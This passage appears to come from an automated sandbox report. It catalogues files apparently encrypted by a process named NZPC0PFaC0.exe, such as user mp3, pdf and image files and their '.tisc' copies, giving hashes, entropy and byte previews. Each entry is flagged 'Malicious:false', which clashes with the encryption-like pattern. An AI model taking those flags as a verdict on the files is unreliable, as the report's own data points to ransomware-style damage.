                                                                                    SHA-256:33DF6AE945F49291FA01F990BBC12D96011C1BB06C9CE0232A64E061EB7FA985
                                                                                    SHA-512:8D18E9247C193926BC3AC6F6B5AA1CABCB30CCB5A86A590CBA48EF1FAD1F685327376408EDD7899C1F1039419421393FD71D0072E0E267CAE56F3F34C56737BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..Uz.E./|.T..k....,l<.4..c..2..~..jF.}.*3].\...'....W1......k.k.7|?Vn0u.......t......?,=}(y.d..B.., ..)..b..t.K.Y.Ye.>'].....0.k$........a....."C.U.~k[.s..BpJ$....0..HD.e./.9.I.p2....>...y......f..M.........g...1t..a.......#..@.............].(..%.5I..>....L.`....o[.#}.r}.K{I.j....4........ .^..*.3.R...2..}..\b+...<......e.%.N.q.p.GC%..g...<.U.q)6. ..W0]N.%.D..f..k.r..m..?....'TU.Z\.0......8..p......X5.........s.CO...v(fV.:O...'JG7.-E.K.f.6.8G.....Q<..-...w..(R#..L_..qJp......(...|.....s..`....l......k.`.d3..p...%.U...7..=.R..R.C........Q......`..R.8...9.Q...eyc.q..&pG......:...........I.Lk..L.n.....+....K..;....{?l....e..7..3..f..5...(...UGC.Gf....&.%....3.$:.......5.lI;..7\..+...B.0.'.7.>m_C..ol<:LD.....l...-\.=...9f$. .=b....O..LO..~c.6...f..-j.oN.]..g:...."R..c.RB.......q<M.......P.5109.3F]..A.+.o3........*..E....,c.5\.._Eb.pWef......uzo.^.\.0..6.H.!R..Q...q...z..2m..E..@zz.."..F`A...#.S8 ...n\..4......f...gy|...?....l..=uT..9.'.
                                                                                    C:\Users\user\Documents\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.841662460483488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YW0NU4LtwtxOCmIIpyrFGDhBNhhw0dx1/UulRwZJsQwTMRis5ByNh+VQgbD:YRtxCmILMf5sulOJwT/wyNkD
                                                                                    MD5:48C8316ECC537622B8008C172CC00030
                                                                                    SHA1:3701EE5D874DE7C6333664BA9D4249D38FD0C38A
                                                                                    SHA-256:33DF6AE945F49291FA01F990BBC12D96011C1BB06C9CE0232A64E061EB7FA985
                                                                                    SHA-512:8D18E9247C193926BC3AC6F6B5AA1CABCB30CCB5A86A590CBA48EF1FAD1F685327376408EDD7899C1F1039419421393FD71D0072E0E267CAE56F3F34C56737BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..Uz.E./|.T..k....,l<.4..c..2..~..jF.}.*3].\...'....W1......k.k.7|?Vn0u.......t......?,=}(y.d..B.., ..)..b..t.K.Y.Ye.>'].....0.k$........a....."C.U.~k[.s..BpJ$....0..HD.e./.9.I.p2....>...y......f..M.........g...1t..a.......#..@.............].(..%.5I..>....L.`....o[.#}.r}.K{I.j....4........ .^..*.3.R...2..}..\b+...<......e.%.N.q.p.GC%..g...<.U.q)6. ..W0]N.%.D..f..k.r..m..?....'TU.Z\.0......8..p......X5.........s.CO...v(fV.:O...'JG7.-E.K.f.6.8G.....Q<..-...w..(R#..L_..qJp......(...|.....s..`....l......k.`.d3..p...%.U...7..=.R..R.C........Q......`..R.8...9.Q...eyc.q..&pG......:...........I.Lk..L.n.....+....K..;....{?l....e..7..3..f..5...(...UGC.Gf....&.%....3.$:.......5.lI;..7\..+...B.0.'.7.>m_C..ol<:LD.....l...-\.=...9f$. .=b....O..LO..~c.6...f..-j.oN.]..g:...."R..c.RB.......q<M.......P.5109.3F]..A.+.o3........*..E....,c.5\.._Eb.pWef......uzo.^.\.0..6.H.!R..Q...q...z..2m..E..@zz.."..F`A...#.S8 ...n\..4......f...gy|...?....l..=uT..9.'.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.833891322938879
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mec+vygzyt4tb1dULk1FuUAkSl5z9ctZYokx7swjOEXRuOKgbD:D7ygutEb1dUqF1B+xcLYokpHOEXR9D
                                                                                    MD5:16E4F33EB13D45E15E6B4B0DDE9B3B21
                                                                                    SHA1:606D9D70364ECF8B25CA0CCC4282744A977B38ED
                                                                                    SHA-256:5E705828A45D5B4D477AF4BBE3D3145F7867DF7A6B6C5CAAE3A8069416B13ABC
                                                                                    SHA-512:409A2B6E55138D9F344FD4EF0498B3853A726005C7151B7BFC2D1CFAE54FC32C466D1ECE629208B9D84D13836E1726708595731782D8973FC9FDF47CD8D7A8FC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: |?.y..HBw..r.L....#t....D..9...F..R.H..-....!n-.;.0.X.9..1.x......g......G.(....7!=..w.2]..=XZ.*.caP.......\.x_.,%6....V...\..%.fSY.h!)Z4?.P5W.,n[.i.......I......9.Dp5...;YuU.V...J.K\.h......o.z.4B.o.1()~.h\.;.....#`....Tf.%.A.).EBT.).2.hI]13....LU.T.]x.?m.f...ePt)Uk."P....;.tvD[....F....=&e...wb.. .....3..u.0.g.#!X.Z.......=..e.3w.....dh...E1A./..3Ye:z...r/./&s.v.........'..7P}x..r4l_..,p..(J....u...$..cM..7.Xz....si...E...F..&-.q..`.~U...]..`..2,.Y...Q*.P.G.a..k.|.....k.z.xJvZy.{..[...6....../.....ct8.cm,.......m...J..(8...L..*u6`.Z..1..Lu.Y.9...!x^\.<.i...V.+u....0.....eE...p:..R........^...X.P/.s/.;..*.b.9r.U?..........~3...E.i}.t...............l..Z.......]...m.n.Z.!.Z)..0...2H.L.2..F.i..;'+...R],fZ..v...[....Q.N..f>..h..:....^NG.5....b..T.K..~.......P.....f...b9.D..Z[b~]B..w8f...g..v..y.&...).....)...^..`.y..O.<.y?R4.....(..t....I.Q..X,/.A/\.f....c.G........5..\"$...U@...S.X..w)T...y(C]j.....B.a<..5.$P...,..O{..q...2..:Uh8.J.,.g.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.833891322938879
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mec+vygzyt4tb1dULk1FuUAkSl5z9ctZYokx7swjOEXRuOKgbD:D7ygutEb1dUqF1B+xcLYokpHOEXR9D
                                                                                    MD5:16E4F33EB13D45E15E6B4B0DDE9B3B21
                                                                                    SHA1:606D9D70364ECF8B25CA0CCC4282744A977B38ED
                                                                                    SHA-256:5E705828A45D5B4D477AF4BBE3D3145F7867DF7A6B6C5CAAE3A8069416B13ABC
                                                                                    SHA-512:409A2B6E55138D9F344FD4EF0498B3853A726005C7151B7BFC2D1CFAE54FC32C466D1ECE629208B9D84D13836E1726708595731782D8973FC9FDF47CD8D7A8FC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: |?.y..HBw..r.L....#t....D..9...F..R.H..-....!n-.;.0.X.9..1.x......g......G.(....7!=..w.2]..=XZ.*.caP.......\.x_.,%6....V...\..%.fSY.h!)Z4?.P5W.,n[.i.......I......9.Dp5...;YuU.V...J.K\.h......o.z.4B.o.1()~.h\.;.....#`....Tf.%.A.).EBT.).2.hI]13....LU.T.]x.?m.f...ePt)Uk."P....;.tvD[....F....=&e...wb.. .....3..u.0.g.#!X.Z.......=..e.3w.....dh...E1A./..3Ye:z...r/./&s.v.........'..7P}x..r4l_..,p..(J....u...$..cM..7.Xz....si...E...F..&-.q..`.~U...]..`..2,.Y...Q*.P.G.a..k.|.....k.z.xJvZy.{..[...6....../.....ct8.cm,.......m...J..(8...L..*u6`.Z..1..Lu.Y.9...!x^\.<.i...V.+u....0.....eE...p:..R........^...X.P/.s/.;..*.b.9r.U?..........~3...E.i}.t...............l..Z.......]...m.n.Z.!.Z)..0...2H.L.2..F.i..;'+...R],fZ..v...[....Q.N..f>..h..:....^NG.5....b..T.K..~.......P.....f...b9.D..Z[b~]B..w8f...g..v..y.&...).....)...^..`.y..O.<.y?R4.....(..t....I.Q..X,/.A/\.f....c.G........5..\"$...U@...S.X..w)T...y(C]j.....B.a<..5.$P...,..O{..q...2..:Uh8.J.,.g.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842768042198242
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AX1kAxwUVdVFhq/ALflV8t81zxutyA8FCKt47pg92ePQ8ngbD:KkyVXFtMt86yAsG7qPQ86D
                                                                                    MD5:5B9EE7E3797BB2F5946BA30A2A77E424
                                                                                    SHA1:EE4C215DDDA04E37141FCBE282AA8023BF173C85
                                                                                    SHA-256:1367227D3912F1A7FE72D0730AE13506D8EF6D0853811D2E998F21CD759A949A
                                                                                    SHA-512:CFDB1F14B2D3114B14C22B71D49DCDC18E4E2B8E655260F01E08B43BAA60D2D67E1F327988E7E2562DB3265303BEA186DA4FDC97D274F68711E1090B7C376070
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: J.....q?.x.a\.X..T.B.X./...v.Q+....|..(.....JIzf.E..H{L".'.M.?......e3N..x.i...y..&...(....... S.+.......z.J.l......Cr-.Lu.9.....' =.:..9+$..0......6d.oW.k..|w......Oz......M.<W{j.n.....o.....t...UZE.w...F...!K.....C.......G........6=..m'...`.^./L.S..\.#.....L7+X_..Et...s..Wc.HD..a..._....)...J.Q18......T.L...F...K..e.....U.nTlFx.'.....g~.A...tK..aO.<.B1z],..`....E.....Q.,.uBo.I....n...R..L1+.Q... .1I..u.>w..!f..^..^..g..f....B.uZ...d.{.^W...}g..Z.P..?...............k-. @uR...M.`&......<c..va..........5:.BTv/.N.].Q."DS..d......Kl.gi.:......a........1.~...J.x.rNR.....9a9OG..!..T).=m.....K.....L...+\X<9.k.%-:..M...d"Qs~.,..8..0Dr'.{@....t.>.&.w.....(..#......S.#.sb....f.sbE..R..%T....&A.&j...V....a.G.....0.=.'.q.....T.|...=.@tYs.Xd|+si........0/T.......x.4my.T.........p.. r.K]...?[..T|.........g{.l....&........?...........n...|.E.M...^.W-..V)X....\......d....=...*...%.......[...K.!.. r=>....ET.z\.Y-^....}w1...Q$t.M..l...Xz..n..cQ.
                                                                                    C:\Users\user\Documents\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842768042198242
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AX1kAxwUVdVFhq/ALflV8t81zxutyA8FCKt47pg92ePQ8ngbD:KkyVXFtMt86yAsG7qPQ86D
                                                                                    MD5:5B9EE7E3797BB2F5946BA30A2A77E424
                                                                                    SHA1:EE4C215DDDA04E37141FCBE282AA8023BF173C85
                                                                                    SHA-256:1367227D3912F1A7FE72D0730AE13506D8EF6D0853811D2E998F21CD759A949A
                                                                                    SHA-512:CFDB1F14B2D3114B14C22B71D49DCDC18E4E2B8E655260F01E08B43BAA60D2D67E1F327988E7E2562DB3265303BEA186DA4FDC97D274F68711E1090B7C376070
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: J.....q?.x.a\.X..T.B.X./...v.Q+....|..(.....JIzf.E..H{L".'.M.?......e3N..x.i...y..&...(....... S.+.......z.J.l......Cr-.Lu.9.....' =.:..9+$..0......6d.oW.k..|w......Oz......M.<W{j.n.....o.....t...UZE.w...F...!K.....C.......G........6=..m'...`.^./L.S..\.#.....L7+X_..Et...s..Wc.HD..a..._....)...J.Q18......T.L...F...K..e.....U.nTlFx.'.....g~.A...tK..aO.<.B1z],..`....E.....Q.,.uBo.I....n...R..L1+.Q... .1I..u.>w..!f..^..^..g..f....B.uZ...d.{.^W...}g..Z.P..?...............k-. @uR...M.`&......<c..va..........5:.BTv/.N.].Q."DS..d......Kl.gi.:......a........1.~...J.x.rNR.....9a9OG..!..T).=m.....K.....L...+\X<9.k.%-:..M...d"Qs~.,..8..0Dr'.{@....t.>.&.w.....(..#......S.#.sb....f.sbE..R..%T....&A.&j...V....a.G.....0.=.'.q.....T.|...=.@tYs.Xd|+si........0/T.......x.4my.T.........p.. r.K]...?[..T|.........g{.l....&........?...........n...|.E.M...^.W-..V)X....\......d....=...*...%.......[...K.!.. r=>....ET.z\.Y-^....}w1...Q$t.M..l...Xz..n..cQ.
                                                                                    C:\Users\user\Documents\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843915102335361
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:57fz+NXd5iQZHlXX16Mw1SxDl5/lvb4ayA09V2ZMGAytId+1gSqTsKlqd3gbD:xfa5DhBEMw149TyA/ZM2U+U42qkD
                                                                                    MD5:680FF5F32DE5977A3FC60A2A4EC7F067
                                                                                    SHA1:9C7BD788ADBA66A5CEA8D70BE3D0CC315C418705
                                                                                    SHA-256:1EA5C1D218DB399DD733F215BF327FE81557B33591EDE014CF2173F2F4A5AE22
                                                                                    SHA-512:74F7ABBF917FDFBF08A1377D65362D03F8985249AE548D9DB6782121DAF986C84764FE8F9AAEF15BABE4246394AB5F9497F709741C1F95F1810870483BF7FFB5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: IWr.X..,yV.R....,....CX.$..}.......)<gC.p...'......Z#.....V.v...n....pk.v.]..,.x...".........9../..5Ei.C.ah..1.(.TVwaEw..m./..wM..p....u .....[.X..^....B..-.._.......)....Q..JU.U.z......T...}.K....!...S#CB.......e..z[...d..| +m.E.yks........:....m...'K..I..|.*./..IG..w.1R....N...2M+...|y ..MeE...K.\6%E.....j#f;w..6......'h.k../+...^..a....n\.5}v.......m}.X"G.Vu1.q.;....w...A,.M,.....R."..^k....k..*.0...@`..|..{..FF7..G.@+o}.I...U......j.O..W[...\..:K.....==..i<%p...T..J.3...q.xBi6.%....p...N8.D..vb........4..Ed...s..h..V.Zd.\{R.....;.&..66..j.....J....q..W)...A.9...2..K...lq.....J^.".#..{.6.....$.O.,...)3....2*^....;4..V5./'~T76.<.....x.g.'...o..CN...mb.yC..'.P........d.>;Av.{..2. ....C.^<..abV.....w8\.fCti...M....f..h.....{B......E>3.\......D:s..w5.%..S.P.....[.M\.FU.t.d..:k.Q.F..4/.|X.=<..OA.6...n..^p.?q.aJ.b:....!.9.3......&y........>A.G._k<..E.U..b....9b|.}j*.q...(D J...Y.\B........Z..Q.W.'.l..:...wV.i....9.$.< :g..'O4.
                                                                                    C:\Users\user\Documents\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843915102335361
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:57fz+NXd5iQZHlXX16Mw1SxDl5/lvb4ayA09V2ZMGAytId+1gSqTsKlqd3gbD:xfa5DhBEMw149TyA/ZM2U+U42qkD
                                                                                    MD5:680FF5F32DE5977A3FC60A2A4EC7F067
                                                                                    SHA1:9C7BD788ADBA66A5CEA8D70BE3D0CC315C418705
                                                                                    SHA-256:1EA5C1D218DB399DD733F215BF327FE81557B33591EDE014CF2173F2F4A5AE22
                                                                                    SHA-512:74F7ABBF917FDFBF08A1377D65362D03F8985249AE548D9DB6782121DAF986C84764FE8F9AAEF15BABE4246394AB5F9497F709741C1F95F1810870483BF7FFB5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: IWr.X..,yV.R....,....CX.$..}.......)<gC.p...'......Z#.....V.v...n....pk.v.]..,.x...".........9../..5Ei.C.ah..1.(.TVwaEw..m./..wM..p....u .....[.X..^....B..-.._.......)....Q..JU.U.z......T...}.K....!...S#CB.......e..z[...d..| +m.E.yks........:....m...'K..I..|.*./..IG..w.1R....N...2M+...|y ..MeE...K.\6%E.....j#f;w..6......'h.k../+...^..a....n\.5}v.......m}.X"G.Vu1.q.;....w...A,.M,.....R."..^k....k..*.0...@`..|..{..FF7..G.@+o}.I...U......j.O..W[...\..:K.....==..i<%p...T..J.3...q.xBi6.%....p...N8.D..vb........4..Ed...s..h..V.Zd.\{R.....;.&..66..j.....J....q..W)...A.9...2..K...lq.....J^.".#..{.6.....$.O.,...)3....2*^....;4..V5./'~T76.<.....x.g.'...o..CN...mb.yC..'.P........d.>;Av.{..2. ....C.^<..abV.....w8\.fCti...M....f..h.....{B......E>3.\......D:s..w5.%..S.P.....[.M\.FU.t.d..:k.Q.F..4/.|X.=<..OA.6...n..^p.?q.aJ.b:....!.9.3......&y........>A.G._k<..E.U..b....9b|.}j*.q...(D J...Y.\B........Z..Q.W.'.l..:...wV.i....9.$.< :g..'O4.
                                                                                    C:\Users\user\Documents\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824635221778756
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/BtQG19Ue0IQxTIB8FZoGtmzuoB3VhxBQqF7YuNRxFugbD:BTvkMyFZV8uo9VhxBQqvNbFrD
                                                                                    MD5:2565DEE85A2009321F465C65AFDBBA7E
                                                                                    SHA1:61EF27CB437ABC58E9570FD1A0C5423324ACBF8A
                                                                                    SHA-256:8DA1AED9F5BE213384399683D38008E1B4DC9A1E06D59CF52FC4858402022217
                                                                                    SHA-512:10D7F0DE115BC2C1F7722CB651792AB5F000EA8AAA243BDDF9AD4DA0B9E4263379DA2CEE7A68516A5EEB068228BE14ECA8DA0B525FCF2B4FE76DF90FD9AEC424
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ku?.j...d"D..d.M/.?iRl......._UY.#....W..2a..x.d.!Lf.......{..% ...~......`L6....._U4LpCx.*X.5-..b... i..x......#.\..)...b.}[..bF....|F.^).q.s.^.5...........7...5.Z0.....U."y.^aT6A......z]..0...".U........(.4..5i.T..%4....d.....a7.y..B...#.s..."jO5s.L..l{..$.9.Jm.Fp..&.'..Sk..u..M.uwl^8....^.S.,.:...Y.C)._..q/R..<..h.{.....1. ...............%.$.2.\xD.7.L..v...[.....\........D~r*:j.6p..N.....Z.... 5..^r.w.,...%.l|.f8...A.v..^Ac3."...*".Y.)#....;B..;.._..2.......R..-..........4.../r>t..E..1..MVJ..w.......M.3.qy.L.>X........W]....[C.9..E._u..B......3.)....!. ...2.**.S.tTb.L....v.,.3X.3$..T.T.......u.s..Y.1....O../}...ns....r5p..r...n..b....s..g..,..V..tL......_7..1F..a.*.YG..[.K.u.&.#!.+.L.r.O......;|..o.F.y.V.9.. .FXR0B.{....2....a:..&..h.R.8~.....U.!.ql......p)...=z...|6..T...h7.~...`3.I...h..#..z3..d.}.~.85..3......Yj..Z..s.N.0.....r.....ymX...z..."5..&E.".a.A..*.\).z~..r.!.LJ..P.93H.`5...X@o....T.J..S..0.CJw]KK.....(.c....i.8=.|...6.
                                                                                    C:\Users\user\Documents\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824635221778756
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/BtQG19Ue0IQxTIB8FZoGtmzuoB3VhxBQqF7YuNRxFugbD:BTvkMyFZV8uo9VhxBQqvNbFrD
                                                                                    MD5:2565DEE85A2009321F465C65AFDBBA7E
                                                                                    SHA1:61EF27CB437ABC58E9570FD1A0C5423324ACBF8A
                                                                                    SHA-256:8DA1AED9F5BE213384399683D38008E1B4DC9A1E06D59CF52FC4858402022217
                                                                                    SHA-512:10D7F0DE115BC2C1F7722CB651792AB5F000EA8AAA243BDDF9AD4DA0B9E4263379DA2CEE7A68516A5EEB068228BE14ECA8DA0B525FCF2B4FE76DF90FD9AEC424
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ku?.j...d"D..d.M/.?iRl......._UY.#....W..2a..x.d.!Lf.......{..% ...~......`L6....._U4LpCx.*X.5-..b... i..x......#.\..)...b.}[..bF....|F.^).q.s.^.5...........7...5.Z0.....U."y.^aT6A......z]..0...".U........(.4..5i.T..%4....d.....a7.y..B...#.s..."jO5s.L..l{..$.9.Jm.Fp..&.'..Sk..u..M.uwl^8....^.S.,.:...Y.C)._..q/R..<..h.{.....1. ...............%.$.2.\xD.7.L..v...[.....\........D~r*:j.6p..N.....Z.... 5..^r.w.,...%.l|.f8...A.v..^Ac3."...*".Y.)#....;B..;.._..2.......R..-..........4.../r>t..E..1..MVJ..w.......M.3.qy.L.>X........W]....[C.9..E._u..B......3.)....!. ...2.**.S.tTb.L....v.,.3X.3$..T.T.......u.s..Y.1....O../}...ns....r5p..r...n..b....s..g..,..V..tL......_7..1F..a.*.YG..[.K.u.&.#!.+.L.r.O......;|..o.F.y.V.9.. .FXR0B.{....2....a:..&..h.R.8~.....U.!.ql......p)...=z...|6..T...h7.~...`3.I...h..#..z3..d.}.~.85..3......Yj..Z..s.N.0.....r.....ymX...z..."5..&E.".a.A..*.\).z~..r.!.LJ..P.93H.`5...X@o....T.J..S..0.CJw]KK.....(.c....i.8=.|...6.
                                                                                    C:\Users\user\Documents\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.856823370779371
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QVQiUjZ3G8E3aqmrxQVoYDpBjUfkiTDYcrMTaBND64c8zNgbD:QmiUNAalxQLHjwkwz8YlcqUD
                                                                                    MD5:726C6396086A81C6336E73D8A69A7CB6
                                                                                    SHA1:3C9E5D2DFD4ED9F881CB9A063D7D3760713A9CF2
                                                                                    SHA-256:F06DB031DB3A9885301F6DD9E371C6F71D79DDF78E1034109BC29874E9A35196
                                                                                    SHA-512:DAB583A1C0FE925CCA118CFD30E31FDBC7442093437AADFB5F7F4ACB629E9836EE4D9A890138CA95A3E6DE968FB4CF0ADDBDD405BC8F59AB8E45D01F592A1AAC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: M.i|.=.....6..]..l...t....Q..D.z.- ..?.LM.T...g4.Wm..X..om..$.B..V/.....J.A.a.p......X."....`v.b.;......gg.G...-Ro.._.../l./......._!..U.Z+<xK.iN......)=.2..b..l......FaJw....%.<.|*.$.n.i...w.|.N@...'h,...4}*..}]T..v.&..t_q{w.....T!....R...@.b.6..+....:..".2.'h.X.0$Lh.....,...C......ljTs.|..N......X.b..0..p.R&...Q....*{m....g..|uD7,I.K_j.LJ.q1C.T)T@ntZxzZ....3..~.5...<G7/./2.V..v1..xn.G...Z......r7B....z}.m.....b2.M..5.V.y...@.j."@.J..2-.....B..!?...\...s...=...m...fD|...;}.A.X.....hz.(..IG.c.F.`!.....PQ.b.....q....=...].~..H../\.p6%.,4......a..S9.._.3...0..,.9,..k.=,.j.nY-....+..aY".uN<@R..R.....i5.F&O...Sa..y.a\..t...t.p....V..X... Z@b..#..!..J\s/z.....`P...`C1IM..>...x.W{....k........y'[E.Bx...G..._`S.L.^I.cC.h...3?.E#...<...J1.".kZ..X..c..Z.xk....iJH.&.=..e...m...G)..}.i.p.........|...=%...[....=......kQ...{....Vh.o.aU............._f..&.@....<7.e.PT..4r..8......:3@.:C'....@vM..m.Uu]...,.....=.....1..)"..."....1..}...=ET.2iy..3.e.k.e.M..w
                                                                                    C:\Users\user\Documents\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.856823370779371
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QVQiUjZ3G8E3aqmrxQVoYDpBjUfkiTDYcrMTaBND64c8zNgbD:QmiUNAalxQLHjwkwz8YlcqUD
                                                                                    MD5:726C6396086A81C6336E73D8A69A7CB6
                                                                                    SHA1:3C9E5D2DFD4ED9F881CB9A063D7D3760713A9CF2
                                                                                    SHA-256:F06DB031DB3A9885301F6DD9E371C6F71D79DDF78E1034109BC29874E9A35196
                                                                                    SHA-512:DAB583A1C0FE925CCA118CFD30E31FDBC7442093437AADFB5F7F4ACB629E9836EE4D9A890138CA95A3E6DE968FB4CF0ADDBDD405BC8F59AB8E45D01F592A1AAC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: M.i|.=.....6..]..l...t....Q..D.z.- ..?.LM.T...g4.Wm..X..om..$.B..V/.....J.A.a.p......X."....`v.b.;......gg.G...-Ro.._.../l./......._!..U.Z+<xK.iN......)=.2..b..l......FaJw....%.<.|*.$.n.i...w.|.N@...'h,...4}*..}]T..v.&..t_q{w.....T!....R...@.b.6..+....:..".2.'h.X.0$Lh.....,...C......ljTs.|..N......X.b..0..p.R&...Q....*{m....g..|uD7,I.K_j.LJ.q1C.T)T@ntZxzZ....3..~.5...<G7/./2.V..v1..xn.G...Z......r7B....z}.m.....b2.M..5.V.y...@.j."@.J..2-.....B..!?...\...s...=...m...fD|...;}.A.X.....hz.(..IG.c.F.`!.....PQ.b.....q....=...].~..H../\.p6%.,4......a..S9.._.3...0..,.9,..k.=,.j.nY-....+..aY".uN<@R..R.....i5.F&O...Sa..y.a\..t...t.p....V..X... Z@b..#..!..J\s/z.....`P...`C1IM..>...x.W{....k........y'[E.Bx...G..._`S.L.^I.cC.h...3?.E#...<...J1.".kZ..X..c..Z.xk....iJH.&.=..e...m...G)..}.i.p.........|...=%...[....=......kQ...{....Vh.o.aU............._f..&.@....<7.e.PT..4r..8......:3@.:C'....@vM..m.Uu]...,.....=.....1..)"..."....1..}...=ET.2iy..3.e.k.e.M..w
                                                                                    C:\Users\user\Documents\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849725500908567
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:wlSB3wbWLoiIM5R4SxQqJzPUAJoPcWvaWlmti2wrfmYEaS79igbD:bAPiIM5RbxQqJzPxecWvdlm0fmYmtD
                                                                                    MD5:C7E879AF05B59E19EA66397EACA1E007
                                                                                    SHA1:35DEE43FF23FFB82390E2295B9D106E5C9A69EC6
                                                                                    SHA-256:525BA4AB5EF23E0F3A23AB577F23C9008FD5310E49715F219ADB9464B88FE4D7
                                                                                    SHA-512:1CB97684E89E733DF94B1A0B524EA1B48FC8CAB5E9BF6B6D114BEE80CC6D2B59C3BAD38E2AE1AF8A4D053225FB59FFF570FEB5A61A2BF81D3269524B4DA71829
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: B.^..{kl.Q..5....F7j..\i..f3n..wkA@.(..#.......l.$.........)...c...BP$..x.3.G.$e..Y.MC.w.....n..x.|.........Q..1..%8..+.....]../..F..rys.$i..8..2.5O..!...@I. ..Y"g].R.I=R....'.........^.......V.w|...o.O.p...>.g.!...n...W.Xh.0.,n..F.@....*>.W.KYm....$..R.........b..tN.....!..y.k...`..W.u.3hr.O.].r....!|.b.<.....^.....G.Xo.7.6N........).Y.........H.iz...a...$!b.P..3S.}1/.-Ta.....ZJsj.p......T&5N<.-o....a..m.F\....W.K&I@.KM;Dz..E9...~i....4].Z....=.....y.....N.En.\...Z.GF...e"8Z..$0.,..Zl;.L...N.k.......].g........A..._g4.....9....mI.-,.i..%@...LJs.M{..)X.....(#.O. .. .}i(;$.._/........G.%.+.J....Q..H.,V.\.e.........l}P.o#l....r...Qv....G..H....?.k.8..do~..v...th.oa.|b...u|...s.........)...V/_......b...^J...l..X...G*n..._.X..qA.....x#.......bu.....Ud:..4G..%V..?F.bI.l/|.@$Yc'...g......O..5..u{...B..7.@.t.l*......9i.S.~d,iD..5.fr..>..T.>......M...C.^X..j..2.V.?.m$}..D........_j. b...H.....;*1m.a.I.CDM...t.#@>..J....x.`.~.
                                                                                    C:\Users\user\Documents\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
